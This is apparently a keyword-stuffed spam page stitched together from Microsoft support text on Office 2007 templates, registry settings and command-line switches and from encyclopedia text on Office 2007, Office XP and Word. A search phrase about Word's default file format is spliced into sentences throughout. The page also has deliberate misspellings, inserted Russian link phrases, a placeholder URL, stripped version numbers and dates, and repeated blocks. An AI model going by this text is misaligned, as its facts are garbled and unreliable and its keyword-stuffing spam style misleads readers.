In dord Modify Location dialog box, change the setting in the Folder name list or the Look in list to the folder gy which you want to save your new templates. Then, select OK. Select OK or Close to close the Options dialog box. The changed path is noted in the Windows registry. Ссылка на подробности path is used the next time that you want to save a new template.

For more information, see the “Changes in the Windows registry settings for the user templates file location and for the workgroup templates file location” section. Your network administrator can change the location in which your new templates are saved by using the policy templates that are included with the Microsoft Office Resource Kit.

For more information, contact your network administrator. You can also create custom tabs that appear in the Templates dialog box by creating a new folder in the Templates folder in your profile. Tabs that have the same name as a new folder appear in the Templates dialog box.

These tabs let you categorize your new templates even more. The template options 2070 available when you click the Microsoft Office Buttonand then click New in Officeor from New under safed File menu in Office Microsoft Office Publisher and Microsoft Office SharePoint Designer do not use the microskft user interface as the previously listed Office programs. The templates that are 20007 in this location are жмите the same as the templates that are saved in your user templates file location.

However, the location is typically a shared folder on a network drive. Your network administrator may set a shared location 5 for window 10 a microsoft office 2007 word documents are saved as a ____ file by default free from which to provide templates that are used throughout your workgroup or company.

The workgroup template file location typically is a read-only shared folder. In addition to looking in your default user templates file location for existing templates, and Office programs look in the workgroup templates file location for more templates. For more information about the doduments templates file location and about how to share a перейти with your workgroup or your company, contact your network administrator.

Advertised templates are the templates that are нажмите сюда with Office programs. These templates appear in the Templates dialog box. Depending on the type of Office installation, you may not have all the templates installed on the computer.

However, each Office program displays the templates as they are available in the Templates dialog box. When you select a template, the Office program determines whether yb template is installed. If the template is installed, a new document that is based on the template opens. If the template is advertised but is not installed, the program prompts you to install the template.

You can remove installed templates for Publisher defaupt starting the Office installation program. Then, set the template group to Installed on First Use. This effectively removes the templates from the computer. Then, the templates become advertised templates again. Microsoft Office Access does not allow for templates to be advertised. However, templates can be set to Not Available in Access The other Office programs do not list templates as a separate component.

By default, all templates mifrosoft are installed with Microsoft Office are installed in the following folder:. The Language ID Number is a four-digit code that represents the language types that are currently installed. For example, the English US version of Office installs a folder. Microsoft office 2007 word documents are saved as a ____ file by default free Arabic version installs a folder.

The German version installs a folder. Additionally, you can microsoft office 2007 word documents are saved as a ____ file by default free multiple languages installed at the same time.

Therefore, you may have a Templates folder that contains several language ID folders. Office programs use non-file-based templates to create new workbooks, documents, databases, and slides. As the name suggests, there is no physical template from which these special files are created. Each Office program has the necessary information to create a new file of the correct type.

For example, if the Word global template Normal. This section, method, or task contains steps that tell you how to modify microsofy registry. However, ad problems might occur if you worv the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you адрес страницы it.

Then, you can restore the registry if a problem occurs. For more information about how to back up dsfault restore the registry, see How to back up and restore the registry in Offfice.

Office programs use two registry keys to record the user templates file location and orfice workgroup templates file az. Both settings are recorded in the following registry key:.

These string values do not exist until you make a change to the default locations for your custom templates. By default, all Office programs look адрес страницы their installed templates. Therefore, no string value is required for Office programs. If microsoft office 2007 word documents are saved as a ____ file by default free change the user templates file location to the default location as described in midrosoft “User templates file location” section, the UserTemplates string value is deleted from the registry.

However, if you change the workgroup templates file location to the default location, the SharedTemplates string value is retained in the registry. Skip to main content. This browser is no longer supported. Download Microsoft Edge More info. Table of contents Exit focus mode. Table of contents. Note If you use Word or Word to change the location in which your new templates are saved, you also change the location in which all Office program templates or all Office program templates are saved.

Note Your network administrator can change the location in which your new templates are saved by using the policy templates that are included with the Microsoft Office Resource Kit. Note Your network administrator may set a shared location as a source from which to provide templates that are used throughout your workgroup or company. Note The Language ID Number http://replace.me/29544.txt a four-digit code that represents the language types that are currently installed.

Important This section, method, or task contains steps that tell you how to modify адрес страницы registry.

In this article.

Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. Word uses a new file format called docx. The release of Word has brought Word a cleaner look and this version focuses further on Cloud Computing with documents being saved automatically to OneDrive (previously Skydrive). If enabled, documents and settings roam with the user. Microsoft Office is a free/paid subscription. The replace.me extension signifies the Office Open XML international standard for Office documents and is used by default by Word and later for Windows as well format became a de facto standard of document file formats for Microsoft Office web is a free lightweight version of Microsoft Word available as part of Office on the web.
Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an . The project released version for Microsoft Word of this software in January followed by versions for Microsoft Excel and Microsoft PowerPoint in December of the same year. Sun Microsystems has created the competing OpenDocument plugin for Microsoft Office (Service Pack 1 or higher), , XP, and that supports Word, Excel. Microsoft Office (codenamed Office 12) is an office suite for Windows, developed and published by replace.me was officially revealed on March 9, and was the 12th version of Microsoft replace.me was released to manufacturing on November 3, ; it was subsequently made available to volume license customers on November 30, , and later to retail on . Microsoft Office XP (codenamed Office 10) is an office suite which was officially revealed in July by Microsoft for the Windows operating replace.me XP was released to manufacturing on March 5, , and was later made available to retail on May 31, , less than five months prior to the release of Windows XP. It is the successor to Office and .


How to manage templates in 2007 Office programs and in 2010 Office programs.Microsoft office 2007 word documents are saved as a ____ file by default free


Outlook , only. All previous roamed preferences are deleted and copied again from the local settings on the computer where this switch is used. Therefore, it is recommended that you only run this command when your Outlook profile only contains the one, target mailbox. This is useful if you cannot delete one of these subscriptions within Outlook Overrides the programmatic lockout that determines which of your computers when you run Outlook at the same time processes meeting items.

The lockout process helps prevent duplicate reminder messages. This switch clears the lockout on the computer it is used. This enables Outlook to process meeting items. Imports the contents of an. If Outlook is already open, queues the profile to be imported on the next clean start.

Provides a way for the user to add an e-mail name to the item. Loads the specified profile. If your profile name contains a space, enclose the profile name in quotation marks ” “. Opens the Choose Profile dialog box regardless of the Options setting on the Tools menu.

Starts Outlook by using an existing Outlook window, if one exists. Note: This is the same command as Upgrade to Color Categories in each Outlook mailbox properties dialog box. Resets default folder names such as Inbox or Sent Items to default names in the current Office user interface language. For example, if you first connect to your mailbox in Outlook by using a Russian user interface, the Russian default folder names cannot be renamed.

To change the default folder names to another language, such as Japanese or English, you can use this switch to reset the default folder names after you change the user interface language or install a different language version of Outlook. Empties the form regions cache and reloads the form region definitions from the Windows registry.

Attempts to open the same profile and folders that were open prior to an abnormal Outlook shutdown. Starts Outlook without the Reading Pane or toolbar customizations. Starts Outlook and opens the specified folder in a new window. Specifies a sharing URL to connect to Outlook. Starts Outlook, forces a detection of new meeting requests in the Inbox , and then adds them to the calendar.

Opens the specified database or Microsoft Access project. You can include a path, if necessary. If the path contains spaces, enclose it in quotation marks. Opens the specified Access database for exclusive access. To open the database for shared use in a multiuser environment, omit this switch.

Applies to Access databases only. Starts Access by using the options in the specified user profile instead of the standard Windows Registry settings created when you installed Access. To compact to a different name, specify a target file. If you include a path that contains spaces, enclose the path in quotation marks.

If you specify a file name in the target database or target Access project parameter but you don’t include a path, the target file is created in the default database folder that is specified in Access. You can change this setting in the Access Options dialog box. In an Access project, this option compacts the Access project.

Another way to run a macro when you open a database is to create a macro named AutoExec. Macros can contain viruses, so you must be careful about running them. Take the following precautions: run up-to-date antivirus software on your computer; use the Trust Center to disable all macros except those that are digitally signed; maintain a list of trusted sources of macros.

Specifies that what follows on the command line is the value that will be returned by the Command function. This option must be the last switch on the command line. Word winword. In Windows 8, press the Windows key, type Run , and then press Enter. Note the following about using command-line switches: You can use only one switch at a time. Switches and parameters are not case-sensitive.

Include one blank space before each switch and one before each parameter. The wizard creates the shortcut and places it on the desktop. Whenever you want to use the shortcut to start the app, double-click it. Switch and parameter Description workbook path file name This parameter does not require a switch. Starts Excel and opens the specified file. Example excel. Here are the command-line switches that are available for PowerPoint. All custom views you created are lost. Examples: Outlook.

Upgrades calendar labels to Outlook color categories. Adds all categories used on non-mail items into the Master Category List Note: This is the same command as Upgrade to Color Categories in each Outlook mailbox properties dialog box. Need more help? Expand your skills. Get new features first. Was this information helpful? Yes No. Thank you! Any more feedback? The more you tell us the more we can help.

Can you help us improve? Resolved my issue. Clear instructions. Easy to follow. No jargon. Pictures helped. To collaborate on one or more documents, a Workspace must be created, and then those who are to work on it must be invited. Any file shared on the workspace are automatically shared among all participants. The application also provides real-time messaging, including one-to-one as well as group messaging, and presence features, as well as monitoring workspace activities with alerts, which are raised when pre-defined set of activities are detected.

Groove also provides features for conflict resolution for conflicting edits. Schedules for a collaboration can also be decided by using a built-in shared calendar, which can also be used to keep track of the progress of a project. However, the calendar is not compatible with Microsoft Outlook.

The Document Theme defines the colors, fonts and graphic effects for a document. Almost everything that can be inserted into a document is automatically styled to match the overall document theme creating a consistent document design.

The new Office Theme file format. Similar themes are also available for data reports in Access and Project or shapes in Visio. Quick Styles are galleries with a range of styles based on the current theme. There are quick styles galleries for text, tables, charts, SmartArt, WordArt and more. Microsoft Office Outlook can also include an optional Business Contact Manager included on a separate installation disc in Office Small Business and above which allows management of business contacts and their sales and marketing activities.

Phone calls, e-mails, appointments, notes and other business metrics can be managed for each contact. It can also keep a track of billable time for each contact on the Outlook Calendar. Based on these data, a consolidated report view can be generated by Microsoft Office Outlook with Business Contact Manager.

The data can be further analyzed using Microsoft Office Excel. This data can also be shared using SharePoint Services. Microsoft Office SharePoint Server allows sharing and collaborative editing of Office documents. It allows central storage of documents and management of Office documents, throughout the enterprise. These documents can be accessed either by the applications which created them, Microsoft Office Outlook , or a web browser.

Documents can also be managed through pre-defined policies that let users create and publish shared content, through a SharePoint site. SharePoint Server allows searching of all Office documents which are being managed by it, centrally, thereby making data more accessible.

It also provides access control for documents. Specialized server components can plug into the SharePoint Server to extend the functionality of the server, such as Excel Services exposing data analysis services for Excel services. Data from other data sources can also be merged with Office data.

SharePoint also lets users personalize the SharePoint sites, filtering content they are interested in. SharePoint documents can also be locally cached by clients for offline editing; the changes are later merged. Microsoft Office Forms Server allows InfoPath forms to be accessed and filled out using any browser, including mobile phone browsers.

Forms Server also supports using a database or other data source as the back-end for the form. Additionally, it allows centralized deployment and management of forms. Forms Server hosted forms also support data validation and conditional formatting, as does their InfoPath counterpart. It also supports advanced controls like Repeating section and Repeating table.

However, some InfoPath controls cannot be used if it must be hosted on a Forms server. Microsoft Office Groove Server is for centrally managing all deployments of Microsoft Office Groove in the enterprise. It enables using Active Directory for Groove user accounts, and create Groove Domains , with individual policy settings. It allows Groove workspaces to be hosted at the server, and the files in the workspaces made available for collaborative editing via the Groove client.

It also includes the Groove Server Data Bridge component to allow communication between data stored at both Groove clients and servers and external applications. Microsoft Office Project Server allows one to centrally manage and coordinate projects. It allows budget and resource tracking, and activity plan management. The project data and reports can also be further analyzed using Cube Building Service. The project management data can be accessed from a browser as well.

Microsoft Office Project Portfolio Server allows creation of a project portfolio, including workflows, hosted centrally, so that the information is available throughout the enterprise, even from a browser. It also aids in centralized data aggregation regarding the project planning and execution, and in visualizing and analyzing the data to optimize the project plan.

It can also support multiple portfolios per project, to track different aspects of it. It also includes reporting tools to create consolidated reports out of the project data.

Microsoft PerformancePoint Server allows users to monitor, analyze, and plan their business as well as drive alignment, accountability, and actionable insight across the entire organization. It includes features for scorecards, dashboards, reporting, analytics, budgeting and forecasting, among others. Even though the ribbon can be hidden, PC World wrote that the new “ribbon” interface crowds the Office work area, especially for notebook users.

As a result, users who were more familiar with the logic of the old menus would be somewhat frustrated with the new, more visually oriented ribbon. The ribbon cannot be moved from the top to the side of the page, as floating toolbars could be.

Some users with experience using previous versions of Microsoft Office have complained about having to find features in the ribbon. Others state that having learnt to use the new interface, it has improved the speed with which “professional-looking” documents can be created. Microsoft contractor Mike Gunderloy left Microsoft partially over his disagreement with the company’s “sweeping land grab ” including its attempt to patent the ribbon interface.

He says “Microsoft itself represents a grave threat to the future of software development through its increasing inclination to stifle competition through legal shenanigans. The new XML-based document file format in Microsoft Office is incompatible with previous versions of Microsoft Office unless an add-on is installed for the older version.

PC World has stated that upgrading to Office presents dangers to certain data, such as templates, macros, and mail messages. The new Word features for bibliographies only support a small number of fixed citation styles.

Using XSLT, new styles can be added. Some extra styles, such as the standard Association for Computing Machinery publication format, are made freely available by third parties. From Wikipedia, the free encyclopedia. Version of Microsoft Office. These four programs make up the Home and Student edition.

Service Pack 3 Main article: Ribbon computing. Main article: OpenDocument software. Main article: Microsoft Word. Main article: Microsoft Outlook. Main article: Microsoft Excel. Main article: Microsoft PowerPoint. Main article: Microsoft OneNote. Main article: Microsoft Access.

Main article: Microsoft Publisher. Main article: Microsoft InfoPath. Main article: Microsoft Visio. Main article: Microsoft Project. Main article: Microsoft SharePoint Designer.

Main article: Microsoft Office Forms Server. Main article: Microsoft Office Groove Server. Main article: Microsoft Office Project Server. News Center. January 29, Archived from the original on September 24, Retrieved November 9, Computer World.

Archived from the original on September 25, System requirements for the Office release. Archived from the original on September 14, Archived from the original on March 7, PC World.

Archived from the original on November 10, DailyTech, LLC. Archived from the original on March 23, CIO Magazine. Archived from the original on March 5, Microsoft TechNet. Wasif K Niazi. Retrieved March 10, Office Support. CBS Interactive. Archived from the original on March 12, Microsoft Support. Archived from the original on July 29, Retrieved June 17, August 27, Retrieved September 14, An Office User Interface Blog.

Archived from the original on September 4, Retrieved October 30, Archived from the original on March 10, Retrieved August 13, Archived from the original on January 7, Retrieved November 10, Retrieved December 17, April 28, May 21, Archived from the original on August 5, Archived from the original on February 18, October 22, Retrieved February 5, Archived from the original on September 10, Archived from the original on May 24, SP3 does not require any earlier service packs to be installed.

Office XP has a streamlined, flatter appearance compared to previous versions of Office. According to Microsoft, this change involved “removing visually competing elements, visually prioritizing items on a page, increasing letter spacing and word spacing for better readability, and defining foreground and background color to bring the most important elements to the front. Excel and Word introduce smart tags , commands for specific types of text including addresses , calendar dates , personal names , telephone numbers , ticker symbols , or tracking numbers in documents.

Excel and Word support extensible smart tags that allow developers and organizations to display custom commands related to specific information.

The smart tags used by Word are also available in Outlook if the former is configured as the default e-mail editor. The AutoCorrect and Paste Options commands in previous versions of Office have been updated to include smart tags that are shared among all Office XP programs. The AutoCorrect smart tag provides individual options to revert an automatic correction or to prohibit an automatic correction from occurring in the future, and also provides access to the AutoCorrect Options dialog box.

After the release of Office XP, Microsoft provided a repository for downloadable smart tags on its website. Office XP introduces a task pane interface that consolidates popular menu bar commands on the right side of the screen to facilitate quick access to them.

Word , for example, includes a task pane dedicated to style and formatting options. Users can switch between open task panes through the use of back and forward buttons; a drop-down list also presents specific task panes to which users can switch.

The default Startup task pane is automatically available when users launch an Office XP program and presents individual commands to open an existing file, create a new blank file or one from a template , add a network location, or open Office Help.

The Search task pane includes individual Basic and Advanced modes and allows users to query local or remote locations for files. The Basic mode allows users to perform full-text searches , while the Advanced mode provides additional file property query options.

The Office Clipboard has been redesigned as the Clipboard task pane across all Office XP programs and can accommodate up to 24 clipboard items compared to 12 in Office Clipboard items provide a visual representation to help users distinguish different types of content. Access and Excel support exporting and importing XML. Users can also save Excel workbooks as XML spreadsheets. Office XP introduces handwriting recognition in all Office programs, allowing users to write with a mouse or stylus instead of entering text by typing on a keyboard.

Once installed, handwriting functionality is also available in Internet Explorer 5 and Outlook Express 5 or later. The downloadable Tablet Pack for Office XP provided an extension for Windows Journal to reuse notes as Outlook items and to import meeting information from Outlook into notes. Speech recognition based on Microsoft Research technology is available for all Office XP programs, allowing users to dictate text into active documents, to change document formatting, and to navigate the interface by voice.

The speech recognition feature encompasses two different modes: Dictation, which transcribes spoken words into text; and Voice Command, which invokes interface features. Speech recognition can be installed during Office XP setup or by clicking the Speech option in the Tools menu in Word When installed, it is available as a Microphone command on the Language toolbar that appears in the upper-right corner of the screen lower-right corner in East-Asian versions of Office XP.

When launched for the first time, speech recognition offers a tutorial to improve recognition accuracy, which begins by providing instructions to adjust the microphone for optimal performance. Users can configure speech recognition settings, including pronunciation sensitivity in voice command mode, accuracy and recognition response time in dictation mode, and microphone settings through the Speech control panel applet. The Regional and Language Options applet provides Language toolbar and additional settings.

With Office XP, Microsoft incorporated several features to address reliability issues observed in previous versions of Office:.

Additionally, all Office XP programs provide options for users to digitally sign documents. When upgrading from a previous version of Office, Office XP retains the user’s previous configuration.

The Custom Installation Wizard can prohibit the installation, use, or uninstallation of programs or features such as the Run from Network and Installed on First Use setup options. Finally, the Custom Maintenance Wizard has been updated to provide customization options to configure Office XP including user preferences and security settings. In an effort to curtail software piracy , Microsoft incorporated product activation technology into all versions of Office XP to prohibit users from installing a single copy of the software in a manner that violates the end-user license agreement EULA.

The EULA allows a single user to install one copy each on a primary device and a portable device such as a laptop. Users who make substantial hardware changes to an Office XP device may need to reactivate the software through the Internet or by telephone. Product activation does not require personally identifiable information. Office XP introduced an optional subscription-based activation model that allowed consumers to annually license the product and receive incremental updates at a reduced price when compared with the cost of a full retail version.

Microsoft originally intended to deliver the activation model to United States customers after the retail availability of Office XP on May 31, , but later decided to make it available to consumers in “a few select locations” instead, citing a more cautious delivery approach.

A new “Ask a Question” feature appears in the top-right corner of all Office XP programs and allows users to type natural language questions and receive answers without opening the Office Assistant “Clippy” or Office Help. Additionally, Office Help has been updated to aggregate and display content from the Internet in response to a query.

The Office Assistant is now disabled by default and only appears when Help is activated. The component products were packaged together in various suites. Some of these editions were available as retail packages in either full or upgrade versions, others as full OEM versions for inclusion with new PCs, and still others as volume license versions that required no activation. All editions provided the core components of Word, Excel, and Outlook, and all editions except the Small Business edition provided PowerPoint.

Microsoft Office XP received mixed to positive reviews after its release. CNET praised the new collaboration and data recovery features, and stated that Office XP offered a “host of incremental improvements” over its predecessor, Office , but ultimately concluded that “most enhancements and additions are better suited for groups than individuals.

While most assessments of Office XP were positive, the speech recognition feature was frequently criticized due to its inaccuracy and lack of advanced functionality. CNET regarded it as “especially lame” because of its inability to recognize text editing commands such as “select the sentence” and because it required users to manually switch between command and dictation modes. From Wikipedia, the free encyclopedia. Version of Microsoft Office suite. These applications make up the Standard edition.

Windows NT 4. List of languages. Main article: Smart tag Microsoft. Intel Pentium III. Hardware accelerated video card or MMX processor. An audio output device and microphone are required for speech recognition.

Collaboration features require Office 97 or later Internet access is required for product activation and online functionality. Touchscreen for handwriting functionality. News Center. May 31, Retrieved February 25, Download Center. March 30, Archived from the original on January 5, Office Support.

May 30, Archived from the original on December 1, Archived from the original on March 7, Retrieved April 9, August 6, Archived from the original on April 14, Retrieved February 26,

Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. The project released version for Microsoft Word of this software in January followed by versions for Microsoft Excel and Microsoft PowerPoint in December of the same year. Sun Microsystems has created the competing OpenDocument plugin for Microsoft Office (Service Pack 1 or higher), , XP, and that supports Word, Excel. Office continues the use of the XML-based file formats, such replace.me,.xlsx, replace.me, introduced in the Office release. Therefore, files created in Microsoft Word , Microsoft Excel , and Microsoft PowerPoint can be opened in the Office release programs without special add-ins or loss of functionality. Word uses a new file format called docx. The release of Word has brought Word a cleaner look and this version focuses further on Cloud Computing with documents being saved automatically to OneDrive (previously Skydrive). If enabled, documents and settings roam with the user. Microsoft Office is a free/paid subscription. Microsoft Office (codenamed Office 12) is an office suite for Windows, developed and published by replace.me was officially revealed on March 9, and was the 12th version of Microsoft replace.me was released to manufacturing on November 3, ; it was subsequently made available to volume license customers on November 30, , and later to retail on .

Therefore, you may have a Templates folder that contains several language ID folders. Office programs use non-file-based templates to create new workbooks, documents, databases, and slides. As the name suggests, there is no physical template from which these special files are created.

Each Office program has the necessary information to create a new file of the correct type. For example, if the Word global template Normal. This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it.

Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, see How to back up and restore the registry in Windows.

Office programs use two registry keys to record the user templates file location and the workgroup templates file location. Both settings are recorded in the following registry key:. These string values do not exist until you make a change to the default locations for your custom templates.

By default, all Office programs look for their installed templates. Therefore, no string value is required for Office programs. If you change the user templates file location to the default location as described in the “User templates file location” section, the UserTemplates string value is deleted from the registry.

However, if you change the workgroup templates file location to the default location, the SharedTemplates string value is retained in the registry. Skip to main content. In the Save as type list, click the file format that you want to save the file in.

For example, click Rich Text Format. For more information about how to save files in PDF. How you back up and recover your files depends on where and when you saved it. To learn more about a feature, including which versions of Office support it, select the name of the feature in the table below. Version History. Version History lets you view and restore previous versions of files stored in OneDrive or SharePoint in Microsoft Back up with OneDrive.

Also see Files save to OneDrive by default in Windows Restore your OneDrive subscription only. You can restore your entire OneDrive to a previous time if your OneDrive files are deleted, overwritten, corrupted, or infected by malware.

Restore deleted files or folders in OneDrive. If AutoRecover is turned on and your file closes unexpectedly, Document Recovery opens the next time you open the Office app.

You can also recover an earlier version of an Office file. Important: Even if AutoRecover is turned on, you should save the file frequently while you’re working on it to avoid losing data because of an unexpected power failure or other problem.

You can save a copy as a new file , or in a different format , or to a different location in Office Tip: If you’re going to create a new file, based on an existing file, but only want your changes saved in the new file it’s a good idea to do the Save a Copy process first thing; before you’ve made any changes.

During the Save, or Save a Copy, process described above you can choose a different location to save your file. Select a folder from the Recent Folders list, or click Browse if you don’t see the location you want listed there. Note: For more information about how to save files in PDF. When you use the Save As dialog box, you can also save the file to a new location by using the Navigation pane. You can also use the Save As dialog box to rename a file or change the location of where you save the file by clicking a different folder.

If you are using Office , you can save files in an earlier version of Office by selecting the version in the Save as type list in the Save As dialog box. For example, you can save your Word document.

Office continues the use of the XML-based file formats, such as. Therefore, files created in Microsoft Word , Microsoft Excel , and Microsoft PowerPoint can be opened in the Office release programs without special add-ins or loss of functionality. Retrieved October 20, Pete Prima Publishing. Low End Mac. I finally got it— WORD.

Buggin’ My Life Away. Archived from the original on May 14, Retrieved June 21, April 25, November 12, Microsoft Download Center. Retrieved August 19, February 7, May 15, Archived from the original on December 3, Archived from the original on January 27, Retrieved May 15, Retrieved November 8, Retrieved December 14, PC Magazine.

Archived from the original on December 2, Archived from the original on April 24, Retrieved December 22, Archived from the original on July 7, Archived from the original on August 18, Archived from the original on June 25, Archived from the original on April 5, Apple Insider.

Archived from the original on October 28, Quirks in the naming of files and folders”. The Eclectic Light Company. Archived from the original on February 26, Retrieved February 26, Macs used to be the only computers that did not need filename extensions January 20, Retrieved July 9, Redmond, WA : Microsoft. Archived from the original on January 10, Retrieved January 10, And some workarounds “. Joel on Software. May 1, In Bolin, Sherrie ed.

Standards Edge: Unifier or Divider? Sheridan Books. SSRN News Center. May 21, III May 21, Archived from the original on July 21, Archived from the original PDF on June 11, Retrieved May 24, Archived from the original on March 18, Retrieved April 5, Archived from the original on July 23, Archived from the original on July 25, Archived from the original on July 22, Archived from the original on March 23, May 4, CNET News.

CBS Interactive. July 5, Archived from the original on February 4, Brian Jones: Office Solutions. Archived from the original on January 18, CNet News. November 8, How-To Geek. Retrieved May 20, Office Support. Retrieved February 4, Retrieved July 1, Archived from the original on May 5, Word , That Is”. Archived from the original on July 8, Sue’s Word Tips.

December 14, Retrieved on July 17, Retrieved August 30, Retrieved September 21, Microsoft Blog. Retrieved July 11, Starts Access by using the options in the specified user profile instead of the standard Windows Registry settings created when you installed Access.

To compact to a different name, specify a target file. If you include a path that contains spaces, enclose the path in quotation marks. If you specify a file name in the target database or target Access project parameter but you don’t include a path, the target file is created in the default database folder that is specified in Access. You can change this setting in the Access Options dialog box.

In an Access project, this option compacts the Access project. Another way to run a macro when you open a database is to create a macro named AutoExec. Macros can contain viruses, so you must be careful about running them.

Take the following precautions: run up-to-date antivirus software on your computer; use the Trust Center to disable all macros except those that are digitally signed; maintain a list of trusted sources of macros. Specifies that what follows on the command line is the value that will be returned by the Command function. This option must be the last switch on the command line. Word winword. In Windows 8, press the Windows key, type Run , and then press Enter.

Note the following about using command-line switches: You can use only one switch at a time. Switches and parameters are not case-sensitive. Include one blank space before each switch and one before each parameter.

The wizard creates the shortcut and places it on the desktop. Whenever you want to use the shortcut to start the app, double-click it. Switch and parameter Description workbook path file name This parameter does not require a switch.

Starts Excel and opens the specified file. Example excel. Here are the command-line switches that are available for PowerPoint. All custom views you created are lost. Examples: Outlook. Upgrades calendar labels to Outlook color categories. Adds all categories used on non-mail items into the Master Category List Note: This is the same command as Upgrade to Color Categories in each Outlook mailbox properties dialog box.

Need more help? Expand your skills. Get new features first. Was this information helpful? Yes No. Thank you! Any more feedback? The more you tell us the more we can help.

Can you help us improve? Resolved my issue. Clear instructions. Easy to follow. No jargon. Pictures helped. Didn’t match my screen. Incorrect instructions. Too technical. Not enough information. Not enough pictures. Any additional feedback? Submit feedback. Thank you for your feedback! Starts Word with a new document based on a template other than the Normal template.

Starts Word and opens an existing file. Starts Word with a new document based on an existing file. Starts Word and then loads a specific Word add-in. Opens a specific workbook as read-only.

Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. Microsoft Office (codenamed Office 12) is an office suite for Windows, developed and published by replace.me was officially revealed on March 9, and was the 12th version of Microsoft replace.me was released to manufacturing on November 3, ; it was subsequently made available to volume license customers on November 30, , and later to retail on . By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an . The project released version for Microsoft Word of this software in January followed by versions for Microsoft Excel and Microsoft PowerPoint in December of the same year. Sun Microsystems has created the competing OpenDocument plugin for Microsoft Office (Service Pack 1 or higher), , XP, and that supports Word, Excel. Office continues the use of the XML-based file formats, such replace.me,.xlsx, replace.me, introduced in the Office release. Therefore, files created in Microsoft Word , Microsoft Excel , and Microsoft PowerPoint can be opened in the Office release programs without special add-ins or loss of functionality.

Microsoft Word is a word processing software developed by Microsoft. Using Wine , versions of Microsoft Word before can be run on Linux. Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office suite of software, which can be purchased either with a perpetual license or as part of a Microsoft subscription. This was made easier by Word for DOS having been designed for use with high-resolution displays and laser printers, even though none were yet available to the general public.

It fulfilled a need for a word processor that was more capable than MacWrite. Word 3. Within a few months, Word 3. Word 5. Many users say it is the best version of Word for Mac OS ever created. The Atari ST version was a port of Word 1. The first version of Word for Windows was released in With the release of Windows 3. As of February [update] , it is still available for download from Microsoft’s web site.

Both the Windows and Mac OS versions would start from the same code base. It was abandoned when it was determined that it would take the development team too long to rewrite and then catch up with all the new capabilities that could have been added at the same time without a rewrite.

With the release of Word 6. It introduced AutoCorrect, which automatically fixed certain typing errors, and AutoFormat, which could reformat many parts of a document at once. While the Windows version received favorable reviews e. Many accused it of being slow, clumsy and memory intensive, and its user interface differed significantly from Word 5.

Word for Windows is available stand-alone or as part of the Microsoft Office suite. Word contains rudimentary desktop publishing capabilities and is the most widely used word processing program on the market. Word files are commonly used as the format for sending text documents via e-mail because almost every user with a computer can read a Word document by using the Word application, a Word viewer or a word processor that imports the Word format see Microsoft Word Viewer.

It was a straightforward port of Word 6. Starting with Word 95, releases of Word were named after the year of its release, instead of its version number. Word introduced a redesigned user interface that emphasized the most common controls, dividing them into tabs, and adding specific options depending on the context, such as selecting an image or editing a table.

The redesigned interface also includes a toolbar that appears when selecting text, with options for formatting included. Word also included the option to save documents as Adobe Acrobat or XPS files, [34] and upload Word documents like blog posts on services such as WordPress. Word allows the customization of the Ribbon, [35] adds a Backstage view for file management, [36] has improved document navigation, allows creation and embedding of screenshots, [37] and integrates with online services such as Microsoft OneDrive.

Word added co-authoring, a visual refresh on the start experience and tabs, automatic cloud saving, dark mode, line focus, an updated draw tab, and support for ODF 1. The Mac was introduced on January 24, , and Microsoft introduced Word 1. Each platform restarted its version numbering at “1. Word 4. The later Word 6 was a Windows port and poorly received. Many people continue to run Word 5. Document compatibility reached parity with Word 97, [29] and it included features from Word 97 for Windows, including spell and grammar checking with squiggles.

Word , released in , added a few new features, including the Office Clipboard , which allowed users to copy and paste multiple items. Word X, released in , was the first version to run natively on, and required, Mac OS X, [40] and introduced non-contiguous text selection. Word was released in May It included a new Notebook Layout view for taking notes either by typing or by voice.

Word , released on January 15, , included a Ribbon-like feature, called the Elements Gallery, that can be used to select page layouts and insert custom diagrams and images. It also included a new view focused on publishing layout, integrated bibliography management, [45] and native support for the new Office Open XML format. It was the first version to run natively on Intel-based Macs.

Word , released in October , replaced the Elements Gallery in favor of a Ribbon user interface that is much more similar to Office for Windows, [47] and includes a full-screen mode that allows users to focus on reading and writing documents, and support for Office Web Apps. Word , added real-time co-authoring, automatic cloud saving, dark mode, immersive reader enhancements, line focus, a visual refresh, the ability to save pictures in SVG format, and a new Sketched style outline.

Microsoft Word’s native file formats are denoted either by a. Although the. The classic Mac OS of the era did not use filename extensions. The newer. During the late s and early s, the default Word document format.

DOC became a de facto standard of document file formats for Microsoft Office users. According to Joel Spolsky , Word Binary File Format is extremely complex mainly because its developers had to accommodate an overwhelming number of features and prioritize performance over anything else. As with all OLE Compound Files, Word Binary Format consists of “storages”, which are analogous to computer folders and “streams”, which are similar to computer files.

Each storage may contain streams or other storage. Word and later continue to support the DOC file format, although it is no longer the default. Opening a Word Document file in a version of Word other than the one with which it was created can cause an incorrect display of the document. The document formats of the various versions change in subtle and not so subtle ways such as changing the font or the handling of more complex tasks like footnotes.

Formatting created in newer versions does not always survive when viewed in older versions of the program, nearly always because that capability does not exist in the previous version. In October , one year before the Microsoft Office suite was released, Microsoft declared that there was insufficient demand from Microsoft customers for the international standard OpenDocument format support and that therefore it would not be included in Microsoft Office This statement was repeated in the following months.

